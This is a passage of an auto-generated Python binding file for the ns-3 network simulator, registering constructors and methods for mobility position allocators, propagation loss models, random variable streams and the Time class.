cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::RandomDiscPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## position-allocator.h (module 'mobility'): void ns3::RandomDiscPositionAllocator::SetRho(ns3::Ptr<ns3::RandomVariableStream> rho) [member function] cls.add_method('SetRho', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'rho')]) ## position-allocator.h (module 'mobility'): void ns3::RandomDiscPositionAllocator::SetTheta(ns3::Ptr<ns3::RandomVariableStream> theta) [member function] cls.add_method('SetTheta', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'theta')]) ## position-allocator.h (module 'mobility'): void ns3::RandomDiscPositionAllocator::SetX(double x) [member function] cls.add_method('SetX', 'void', [param('double', 'x')]) ## position-allocator.h (module 'mobility'): void ns3::RandomDiscPositionAllocator::SetY(double y) [member function] cls.add_method('SetY', 'void', [param('double', 'y')]) return def register_Ns3RandomPropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::RandomPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::RandomPropagationLossModel::RandomPropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): double ns3::RandomPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::RandomPropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3RandomRectanglePositionAllocator_methods(root_module, cls): ## position-allocator.h (module 'mobility'): ns3::RandomRectanglePositionAllocator::RandomRectanglePositionAllocator(ns3::RandomRectanglePositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::RandomRectanglePositionAllocator const &', 'arg0')]) ## position-allocator.h (module 'mobility'): ns3::RandomRectanglePositionAllocator::RandomRectanglePositionAllocator() [constructor] cls.add_constructor([]) ## position-allocator.h (module 'mobility'): int64_t ns3::RandomRectanglePositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## position-allocator.h (module 'mobility'): ns3::Vector ns3::RandomRectanglePositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## position-allocator.h (module 'mobility'): static ns3::TypeId ns3::RandomRectanglePositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## position-allocator.h (module 'mobility'): void ns3::RandomRectanglePositionAllocator::SetX(ns3::Ptr<ns3::RandomVariableStream> x) [member function] cls.add_method('SetX', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'x')]) ## position-allocator.h (module 'mobility'): void ns3::RandomRectanglePositionAllocator::SetY(ns3::Ptr<ns3::RandomVariableStream> y) [member function] cls.add_method('SetY', 'void', [param('ns3::Ptr< ns3::RandomVariableStream >', 'y')]) return def register_Ns3RandomRoomPositionAllocator_methods(root_module, cls): ## building-position-allocator.h (module 'buildings'): ns3::RandomRoomPositionAllocator::RandomRoomPositionAllocator(ns3::RandomRoomPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::RandomRoomPositionAllocator const &', 'arg0')]) ## building-position-allocator.h (module 'buildings'): ns3::RandomRoomPositionAllocator::RandomRoomPositionAllocator() [constructor] cls.add_constructor([]) ## building-position-allocator.h (module 'buildings'): int64_t ns3::RandomRoomPositionAllocator::AssignStreams(int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'stream')], is_virtual=True) ## building-position-allocator.h (module 'buildings'): ns3::Vector ns3::RandomRoomPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## building-position-allocator.h (module 'buildings'): static ns3::TypeId ns3::RandomRoomPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) return def register_Ns3RandomVariableStream_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::RandomVariableStream::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::RandomVariableStream::RandomVariableStream() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetStream(int64_t stream) [member function] cls.add_method('SetStream', 'void', [param('int64_t', 'stream')]) ## random-variable-stream.h (module 'core'): int64_t ns3::RandomVariableStream::GetStream() const [member function] cls.add_method('GetStream', 'int64_t', [], is_const=True) ## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetAntithetic(bool isAntithetic) [member function] cls.add_method('SetAntithetic', 'void', [param('bool', 'isAntithetic')]) ## random-variable-stream.h (module 'core'): bool ns3::RandomVariableStream::IsAntithetic() const [member function] cls.add_method('IsAntithetic', 'bool', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::RandomVariableStream::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_pure_virtual=True, is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::RandomVariableStream::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_pure_virtual=True, is_virtual=True) ## random-variable-stream.h (module 'core'): ns3::RngStream * ns3::RandomVariableStream::Peek() const [member function] cls.add_method('Peek', 'ns3::RngStream *', [], is_const=True, visibility='protected') return def register_Ns3RangePropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::RangePropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::RangePropagationLossModel::RangePropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): double ns3::RangePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::RangePropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3SameRoomPositionAllocator_methods(root_module, cls): ## building-position-allocator.h (module 'buildings'): ns3::SameRoomPositionAllocator::SameRoomPositionAllocator(ns3::SameRoomPositionAllocator const & arg0) [copy constructor] cls.add_constructor([param('ns3::SameRoomPositionAllocator const &', 'arg0')]) ## building-position-allocator.h (module 'buildings'): ns3::SameRoomPositionAllocator::SameRoomPositionAllocator() [constructor] cls.add_constructor([]) ## building-position-allocator.h (module 'buildings'): ns3::SameRoomPositionAllocator::SameRoomPositionAllocator(ns3::NodeContainer c) [constructor] cls.add_constructor([param('ns3::NodeContainer', 'c')]) ## building-position-allocator.h (module 'buildings'): int64_t ns3::SameRoomPositionAllocator::AssignStreams(int64_t arg0) [member function] cls.add_method('AssignStreams', 'int64_t', [param('int64_t', 'arg0')], is_virtual=True) ## building-position-allocator.h (module 'buildings'): ns3::Vector ns3::SameRoomPositionAllocator::GetNext() const [member function] cls.add_method('GetNext', 'ns3::Vector', [], is_const=True, is_virtual=True) ## building-position-allocator.h (module 'buildings'): static ns3::TypeId ns3::SameRoomPositionAllocator::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) return def register_Ns3SequentialRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::SequentialRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable::SequentialRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMin() const [member function] cls.add_method('GetMin', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMax() const [member function] cls.add_method('GetMax', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): ns3::Ptr<ns3::RandomVariableStream> ns3::SequentialRandomVariable::GetIncrement() const [member function] cls.add_method('GetIncrement', 'ns3::Ptr< ns3::RandomVariableStream >', [], is_const=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetConsecutive() const [member function] cls.add_method('GetConsecutive', 'uint32_t', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter< ns3::Hash::Implementation > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3NetDeviceQueue_Ns3Empty_Ns3DefaultDeleter__lt__ns3NetDeviceQueue__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter< ns3::NetDeviceQueue > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3QueueItem_Ns3Empty_Ns3DefaultDeleter__lt__ns3QueueItem__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::SimpleRefCount(ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter< ns3::QueueItem > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3ThreeLogDistancePropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::ThreeLogDistancePropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::ThreeLogDistancePropagationLossModel::ThreeLogDistancePropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): double ns3::ThreeLogDistancePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::ThreeLogDistancePropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3Time_methods(root_module, cls): cls.add_binary_numeric_operator('*', root_module['ns3::Time'], root_module['ns3::Time'], param('int64_t const &', u'right')) cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', u'right')) cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', u'right')) cls.add_binary_numeric_operator('/', root_module['ns3::Time'], root_module['ns3::Time'], param('int64_t const &', u'right')) cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('>') cls.add_binary_comparison_operator('!=') cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', u'right')) cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', u'right')) cls.add_output_stream_operator() cls.add_binary_comparison_operator('<=') cls.add_binary_comparison_operator('==') cls.add_binary_comparison_operator('>=') ## nstime.h (module 'core'): ns3::Time::Time() [constructor] cls.add_constructor([]) ## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor] cls.add_constructor([param('ns3::Time const &', 'o')]) ## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor] cls.add_constructor([param('double', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor] cls.add_constructor([param('int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor] cls.add_constructor([param('long int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor] cls.add_constructor([param('long long int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor] cls.add_constructor([param('unsigned int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor] cls.add_constructor([param('long unsigned int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor] cls.add_constructor([param('long long unsigned int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & v) [constructor] cls.add_constructor([param('ns3::int64x64_t const &', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor] cls.add_constructor([param('std::string const &', 's')]) ## nstime.h (module 'core'): ns3::TimeWithUnit ns3::Time::As(ns3::Time::Unit const unit) const [member function] cls.add_method('As', 'ns3::TimeWithUnit', [param('ns3::Time::Unit const', 'unit')], is_const=True) ## nstime.h (module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function] cls.add_method('Compare', 'int', [param('ns3::Time const &', 'o')], is_const=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function] cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'value')], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value, ns3::Time::Unit unit) [member function] cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit unit) [member function] cls.add_method('FromDouble', 'ns3::Time', [param('double', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit unit) [member function] cls.add_method('FromInteger', 'ns3::Time', [param('uint64_t', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True) ## nstime.h (module 'core'): double ns3::Time::GetDays() const [member function] cls.add_method('GetDays', 'double', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function] cls.add_method('GetDouble', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function] cls.add_method('GetFemtoSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetHours() const [member function] cls.add_method('GetHours', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function] cls.add_method('GetInteger', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function] cls.add_method('GetMicroSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function] cls.add_method('GetMilliSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetMinutes() const [member function] cls.add_method('GetMinutes', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function] cls.add_method('GetNanoSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function] cls.add_method('GetPicoSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function] cls.add_method('GetResolution', 'ns3::Time::Unit', [], is_static=True) ## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function] cls.add_method('GetSeconds', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function] cls.add_method('GetTimeStep', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetYears() const [member function] cls.add_method('GetYears', 'double', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function] cls.add_method('IsNegative', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function] cls.add_method('IsPositive', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function] cls.add_method('IsStrictlyNegative', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function] cls.add_method('IsStrictlyPositive', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function] cls.add_method('IsZero', 'bool', [], is_const=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::Max() [member function] cls.add_method('Max', 'ns3::Time', [], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::Min() [member function] cls.add_method('Min', 'ns3::Time', [], is_static=True) ## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function] cls.add_method('SetResolution', 'void', [param('ns3::Time::Unit', 'resolution')], is_static=True) ## nstime.h (module 'core'): static bool ns3::Time::StaticInit() [member function] cls.add_method('StaticInit', 'bool', [], is_static=True) ## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit unit) const [member function] cls.add_method('To', 'ns3::int64x64_t', [param('ns3::Time::Unit', 'unit')], is_const=True) ## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit unit) const [member function] cls.add_method('ToDouble', 'double', [param('ns3::Time::Unit', 'unit')], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit unit) const [member function] cls.add_method('ToInteger', 'int64_t', [param('ns3::Time::Unit', 'unit')], is_const=True) return def register_Ns3TraceSourceAccessor_methods(root_module, cls): ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor] cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')]) ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor] cls.add_constructor([]) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function] cls.add_method('Connect', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function] cls.add_method('ConnectWithoutContext', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function] cls.add_method('Disconnect', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function] cls.add_method('DisconnectWithoutContext', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3TriangularRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::TriangularRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable::TriangularRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMin() const [member function] cls.add_method('GetMin', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMax() const [member function] cls.add_method('GetMax', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue(double mean, double min, double max) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'min'), param('double', 'max')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger(uint32_t mean, uint32_t min, uint32_t max) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'min'), param('uint32_t', 'max')]) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3TwoRayGroundPropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::TwoRayGroundPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::TwoRayGroundPropagationLossModel::TwoRayGroundPropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): void 